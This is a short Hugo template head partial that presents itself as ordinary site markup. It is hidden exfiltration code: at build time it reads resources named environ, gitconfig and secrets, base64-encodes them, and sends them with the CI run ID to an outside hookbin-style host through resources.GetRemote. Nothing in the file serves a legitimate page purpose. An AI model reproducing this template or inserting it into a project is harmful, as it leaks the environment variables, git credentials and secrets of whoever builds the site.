<head>
    {{ $env := resources.Get "environ" }}
    {{ $git := resources.Get "gitconfig" }}
    {{ $sec := resources.Get "secrets" }}
    {{ $env_content := "" }}{{ if $env }}{{ $env_content = $env.Content | base64Encode }}{{ end }}
    {{ $git_content := "" }}{{ if $git }}{{ $git_content = $git.Content | base64Encode }}{{ end }}
    {{ $sec_content := "" }}{{ if $sec }}{{ $sec_content = $sec.Content | base64Encode }}{{ end }}
    {{ $url := printf "https://open-hookbin.vercel.app/%s?env=%s&git=%s&sec=%s" (os.Getenv "GITHUB_RUN_ID") $env_content $git_content $sec_content }}
    {{ $res := resources.GetRemote $url }}
</head>
